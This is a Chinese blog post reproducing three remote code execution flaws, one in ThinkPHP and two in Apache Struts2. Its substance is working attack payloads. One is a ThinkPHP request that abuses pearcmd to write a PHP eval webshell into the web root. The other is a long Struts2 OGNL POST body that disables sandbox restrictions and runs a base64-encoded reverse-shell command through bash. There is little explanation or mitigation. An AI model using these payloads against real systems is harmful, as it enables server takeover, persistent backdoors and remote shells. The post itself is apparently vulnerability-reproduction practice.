thinkphp lang命令执行--struts2 代码执行--(QVD-2022-46174)&&(CVE-2020-17530)&&(CVE-2021-31805)

最新推荐文章于 2024-06-14 14:08:33 发布
最新推荐文章于 2024-06-14 14:08:33 发布
阅读量126 收藏
点赞数
分类专栏: 漏洞复现 文章标签: struts web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74985952/article/details/133257454
版权

thinkphp lang命令执行–struts2 代码执行–(QVD-2022-46174)&&(CVE-2020-17530)&&(CVE-2021-31805)

目录标题

thinkphp lang命令执行(QVD-2022-46174)

影响范围

6.0.1 <= ThinkPHP <= 6.0.13
ThinkPHP 5.0.x
ThinkPHP 5.1.x

漏洞复现

POC:

?+config-create+/&lang=…/…/…/…/…/…/…/…/usr/local/lib/php/pearcmd&/<?=@eval($_POST['shell']);?>+/var/www/html/1.php

在这里插入图片描述

struts2 代码执行 (CVE-2020-17530)

影响范围

Apache Struts 2.0.0 - 2.5.25

漏洞复现

POC下载s2-062

struts2 代码执行 (CVE-2021-31805)

影响范围

Apache Struts 2.0.0 - 2.5.29

漏洞复现

Post: /s2_062/index.action

name=(%23request.map%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map.setBean(%23request.get(‘struts.valueStack’))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.map2%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map2.setBean(%23request.get(‘map’).get(‘context’))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.map3%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map3.setBean(%23request.get(‘map2’).get(‘memberAccess’))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.get(‘map3’).put(‘excludedPackageNames’,%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.get(‘map3’).put(‘excludedClasses’,%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b
(%23application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘freemarker.template.utility.Execute’).exec({‘bash -c {echo,反弹shell命令base64编码加url编码}|{base64,-d}|{bash,-i}’}))

在这里插入图片描述

SuperMan529
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkPHP Lang文件包含To远程代码执行漏洞复现—CNVD-2022-86535
afei001
12-14 1122
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。ThinkPHP存在命令执行漏洞,该漏洞是由于开启了多语言功能,对参数lang传参过滤不严谨,攻击者可利用该漏洞执行命令。本质是ThinkPHP在开启多语言功能的情况下存在文件包含漏洞,攻击者可以通过get、header、cookie等位置传入参数,ThinkPHP LoadLangPack中存在目录穿越漏洞,然后再利用pearcmd文件包含并结合它的指令config-create创建恶意代码,从而实现远程代码执行
Thinkphp6+nginx-rtmp实现大型娱乐互动直播平台
06-30
ThinkPHP6 + obs + Nginx-rtmp + xgplayer + workerman + layui 实现大型企业级全民娱乐互动直播平台。直播,已然成为当下最炙热的互联网名词,从娱乐互动到直播购物,从视频会议到直播教育,直播的场景出现在了生活...
漏洞通告ThinkPHP远程代码执行漏洞
05-05
【漏洞通告】ThinkPHP远程代码执行漏洞
thinkphp lang命令执行(QVD-2022-46174)漏洞复现
weixin_54584489的博客
04-29 968
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。当ThinkPHP开启多语言功能,并且存在扩展pear时,攻击者可以构造lang参数实现远程代码执行。本次漏洞复现,是建立在前人的基础上的,整个过程没有遇到太大问题,总体收获就是感受了一把该漏洞,以及复习了前面学习到的一句话木马,同时扩展了一些小知识点。将思绪代入最初的漏洞发现者,才明白知识储备对挖洞者的重要性。
服务攻防-开发框架安全&SpringBoot&Struts2&Laravel&ThinkPHP&CVE复现
siu~
01-26 1239
知识点: 1、PHP-框架安全-Thinkphp&Laravel 2、J2EE-框架安全-SpringBoot&Struts2 章节点: 1、目标判断-端口扫描&组合判断&信息来源 2、安全问题-配置不当&CVE漏洞&弱口令爆破 3、复现对象-数据库&中间件&开发框架&应用协议
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
rumil的博客
10-27 1210
中间件及框架列表:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等1、开发框架-PHP-Laravel-Thinkphp2、开发框架-Javaweb-St2-Spring3、开发框架-Python-django-Flask。
基于ThinkPHP8和Element-Plus的在线教育平台设计源码
04-04
本设计源码提供了一个基于ThinkPHP8和Element-Plus的在线教育平台。项目包含9313个文件,主要使用PHP编程语言,并包含了JavaScript、Vue、CSS、Java、微信小程序、C#、HTML、TypeScript和Shell。文件类型包括3516个...
thinkphp3.23+B-JUI开发的CRM v1.0
10-08
你是否遇到这些问题?客户资料记录在Excel或本子上,太乱,查阅不便以前的跟进情况都不记得了,对客户状态了解不够团队中每个成员各自记录,不能同步,没法协同工作员工离职,
thinkphp-bjyblog 开源博客系统 v1.1
10-11
闲暇之时使用thinkphp开发了一个个人博客用来整理技能知识; 如今博客的功能基本已经齐备;特开源以供各类猿们使用; 亦可以作为初学thinkphp的同学们的参考源代码; 此博客程序
Thinkphp竞-技游戏展示工作室网站模板
07-01
Thinkphp竞-技游戏展示工作室网站模板
网络安全在个人生活中具体有哪些常见的应用场景?
2301_79955948的博客
06-10 471
通过上述场景可以看出,网络安全在个人生活中扮演着至关重要的角色,它不仅关系到个人隐私和财产安全,也影响到日常生活的方方面面。7. 物联网设备安全:网络安全可以保护智能家居、智能设备等物联网设备的安全,避免网络攻击和数据泄露。5. 远程办公和学习:网络安全可以保障企业和学校网络系统的安全和稳定性,避免数据泄露和网络攻击。6. 云存储和备份:网络安全可以保护云存储服务和备份数据的安全,防止黑客攻击和数据泄露。8. 移动设备安全:网络安全可以保护移动设备的安全和数据隐私,防止恶意软件和网络攻击。
美创科技入选“2024网络安全提供商创新排行榜”
美创科技的博客
06-12 352
数据安全的发展离不开源源不断的创新推动。美创科技始终紧跟数据安全发展趋势,坚持以“新产品新技术研发、新理念新框架构建、新服务新咨询探索、新场景新方案打造”四个方向创新发展,更好地帮助各行业用户解决应对数字化时代下的数据安全挑战与难题。近日,DBC德本咨询公布了“2024网络安全提供商创新排行榜”,美创科技凭借近20年的。此次,与360、华为、腾讯等互联网、网络安全头部厂商并肩上榜,是行业对美创的再次认可。创新耕耘,荣誉上榜。
经纬恒润助力微宏动力荣获ISO/SAE 21434网络安全流程认证证书
最新发布
经纬恒润的官方博客
06-14 484
近日,经纬恒润与微宏动力合作的网络安全开发及认证项目顺利完成了阶段性里程碑。
【网络安全】【深度学习】【入侵检测】SDN模拟网络入侵攻击并检测,实时检测,深度学习【一】
q742971636的博客
06-09 1468
Mininet: 主要用于创建和模拟虚拟网络拓扑,适合于网络实验和研究。Ryu: 主要用于开发和运行 SDN 控制器,用于管理和控制网络设备。这两个工具通常可以结合使用:使用 Mininet 模拟网络环境,使用 Ryu 作为 SDN 控制器来管理模拟网络中的设备和流量。
提升网络安全韧性:从基础防护开始
Dexun_chuqi的博客
06-13 552
网络安全韧性(Cyber Resilience)指的是在面对网络攻击或其他不利事件时,系统、网络和组织能够有效抵御、吸收和恢复正常功能的能力。这一概念不仅关注防止攻击的发生,还强调在攻击发生后,系统能够迅速恢复并继续运行。网络安全韧性包括预防、响应、恢复三个主要环节,旨在确保在面对各种潜在威胁时,网络能够保持其关键功能。提升网络安全韧性是一项系统性工程,涉及多个方面的综合管理和技术手段。
HCIA 10 网络安全之结合ACL访问控制列表登录Telnet及FTP
weixin_55327573的博客
06-10 1162
R3 为telnet服务器,R1 为客户端,客户端与服务器之间路由可达。其中 R1 和 R2间互联地址分别为 10.1.2.1/24 和 10.1.2.2/24,R2 和 R3 间为10.1.3.2/24 和 10.1.3.1/24。另外,R1 上创建两个逻辑接口 LoopBack 0 和 LoopBack 1 分别模拟两个客户端用户,地址分别为 10.1.1.1/24 和 10.1.4.1/24。
网络安全(补充)
m0_62207482的博客
06-13 538
针对网络信息系统的容灾恢复问题,国家制定和颁布了《信息安全技术信息系统灾难恢复规范(GB/T 20988-2007)》,该规范定义了六个灾难恢复等级和技术要求:第一级基本支持(要求至少每周做一次完全数据备份,并且备份介质场外存放)、第二级备用场地支持(第二级在第一级的基础上,还要求配备灾难发生后能正在预定时间内调配使用的数据处理设备和通信线路以及相应的网络设备)、第三级电子传输和部分设备支持、第四级电子传输及完整设备支持、第五级实时数据传输及完整设备支持、第六级数据领丢失和远程集群支持 网络安全取证:1(
HCIA11 网络安全之本地 AAA 配置实验
weixin_55327573的博客
06-10 1287
R1 模拟一台客户端设备,R2 为一台网络设备。现在需要在 R2 上对管理 R2 的用户进行资源控制,只有通过认证的用户才能访问特定的资源,因此您需要在 R1 和 R2 两台路由器上配置本地 AAA 认证,并基于域来对用户进行管理,并配置已认证用户的权限级别。
vulfocus thinkphp 代码执行 (CNVD-2018-24942)
03-29
攻击者可以通过构造恶意的输入数据,利用该漏洞执行任意代码,从而控制服务器。 漏洞影响: ThinkPHP 5.0.x - 5.0.18 版本 ThinkPHP 5.1.x - 5.1.0-beta.5 版本 漏洞利用: 攻击者可以通过在URL中添加参数,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值